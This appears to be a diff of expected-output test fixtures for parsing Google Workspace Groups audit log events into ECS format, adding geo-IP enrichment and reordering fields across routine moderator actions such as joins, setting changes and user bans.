@@ -124,8 +124,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286032300Z", + "ingested": "2021-12-14T14:45:12.889091802Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"accept_invitation\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}", "provider": "groups", "action": "accept_invitation", @@ -150,24 +171,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
@@ -202,8 +214,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286037800Z", + "ingested": "2021-12-14T14:45:12.889092255Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"approve_join_request\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}", "provider": "groups", "action": "approve_join_request", @@ -231,24 +264,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
@@ -279,8 +303,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286042300Z", + "ingested": "2021-12-14T14:45:12.889092672Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"join\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}", "provider": "groups", "action": "join", @@ -305,24 +350,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
@@ -353,8 +389,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286046800Z", + "ingested": "2021-12-14T14:45:12.889093060Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"request_to_join\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}", "provider": "groups", "action": "request_to_join", @@ -379,24 +436,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
@@ -430,8 +478,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286052100Z", + "ingested": "2021-12-14T14:45:12.889093449Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_basic_setting\",\"parameters\":[{\"name\":\"basic_setting\",\"value\":\"allow_external_members\"},{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"new_value\",\"value\":\"true\"},{\"name\":\"old_value\",\"value\":\"false\"}]}}", "provider": "groups", "action": "change_basic_setting", @@ -456,24 +525,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
@@ -504,8 +564,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286057300Z", + "ingested": "2021-12-14T14:45:12.889093839Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"create_group\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}", "provider": "groups", "action": "create_group", @@ -529,24 +610,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
@@ -577,8 +649,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286062500Z", + "ingested": "2021-12-14T14:45:12.889094238Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"delete_group\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"}]}}", "provider": "groups", "action": "delete_group", @@ -602,24 +695,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
@@ -653,8 +737,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286067700Z", + "ingested": "2021-12-14T14:45:12.889094623Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_identity_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"identity_setting\",\"value\":\"required_forms_of_identity\"},{\"name\":\"new_value\",\"value\":\"display_name_only\"},{\"name\":\"old_value\",\"value\":\"display_name_or_google_profile\"}]}}", "provider": "groups", "action": "change_identity_setting", @@ -679,24 +784,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
@@ -729,8 +825,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286072900Z", + "ingested": "2021-12-14T14:45:12.889095008Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"add_info_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"info_setting\",\"value\":\"custom_footer\"},{\"name\":\"value\",\"value\":\"footer\"}]}}", "provider": "groups", "action": "add_info_setting", @@ -755,24 +872,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
@@ -806,8 +914,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286078200Z", + "ingested": "2021-12-14T14:45:12.889095395Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_info_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"info_setting\",\"value\":\"custom_footer\"},{\"name\":\"new_value\",\"value\":\"footer\"},{\"name\":\"old_value\",\"value\":\"old footer\"}]}}", "provider": "groups", "action": "change_info_setting", @@ -832,24 +961,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
@@ -882,8 +1002,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286083700Z", + "ingested": "2021-12-14T14:45:12.889095982Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"remove_info_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"info_setting\",\"value\":\"custom_footer\"},{\"name\":\"value\",\"value\":\"footer\"}]}}", "provider": "groups", "action": "remove_info_setting", @@ -908,24 +1049,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
@@ -959,8 +1091,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286088900Z", + "ingested": "2021-12-14T14:45:12.889096392Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_new_members_restrictions_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"new_members_restrictions_setting\",\"value\":\"new_members_can_post\"},{\"name\":\"new_value\",\"value\":\"inherit\"},{\"name\":\"old_value\",\"value\":\"overriden_to_false\"}]}}", "provider": "groups", "action": "change_new_members_restrictions_setting", @@ -985,24 +1138,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
@@ -1036,8 +1180,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286094100Z", + "ingested": "2021-12-14T14:45:12.889096776Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_post_replies_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"post_replies_setting\",\"value\":\"where_should_replies_be_sent\"},{\"name\":\"new_value\",\"value\":\"reply_to_custom_address\"},{\"name\":\"old_value\",\"value\":\"reply_to_author_only\"}]}}", "provider": "groups", "action": "change_post_replies_setting", @@ -1062,24 +1227,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
@@ -1113,8 +1269,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286099400Z", + "ingested": "2021-12-14T14:45:12.889097164Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_spam_moderation_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"spam_moderation_setting\",\"value\":\"how_to_handle_suspected_spam_messages\"},{\"name\":\"new_value\",\"value\":\"moderate_and_do_not_send_notifications\"},{\"name\":\"old_value\",\"value\":\"moderate_and_send_notifications\"}]}}", "provider": "groups", "action": "change_spam_moderation_setting", @@ -1139,24 +1316,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
@@ -1182,16 +1350,37 @@ "event": { "type": "moderator_action" }, - "kind": "admin#reports#activity", - "organization": { - "domain": "elastic.com" - } - }, - "organization": { - "id": "1" + "kind": "admin#reports#activity", + "organization": { + "domain": "elastic.com" + } + }, + "organization": { + "id": "1" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:12.286104600Z", + "ingested": "2021-12-14T14:45:12.889097549Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"change_topic_setting\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"topic_setting\",\"value\":\"allowed_topic_types\"},{\"name\":\"new_value\",\"value\":\"discussions_questions\"},{\"name\":\"old_value\",\"value\":\"discussions\"}]}}", "provider": "groups", "action": "change_topic_setting", @@ -1216,24 +1405,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
@@ -1269,8 +1449,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286109900Z", + "ingested": "2021-12-14T14:45:12.889098064Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"moderate_message\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"message_moderation_action\",\"value\":\"approved\"},{\"name\":\"status\",\"value\":\"succeeded\"},{\"name\":\"message_id\",\"value\":\"message id\"}]}}", "provider": "groups", "action": "moderate_message", @@ -1294,24 +1495,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
@@ -1347,8 +1539,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286115200Z", + "ingested": "2021-12-14T14:45:12.889098456Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"always_post_from_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"},{\"name\":\"status\",\"value\":\"succeeded\"}]}}", "provider": "groups", "action": "always_post_from_user", @@ -1375,24 +1588,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
@@ -1428,8 +1632,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286120500Z", + "ingested": "2021-12-14T14:45:12.889098867Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"add_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"},{\"name\":\"member_role\",\"value\":\"manager\"}]}}", "provider": "groups", "action": "add_user", @@ -1457,24 +1682,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
@@ -1510,8 +1726,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:12.286125700Z", + "ingested": "2021-12-14T14:45:12.889099261Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"ban_user_with_moderation\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"},{\"name\":\"member_role\",\"value\":\"manager\"}]}}", "provider": "groups", "action": "ban_user_with_moderation", @@ -1539,24 +1776,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" 
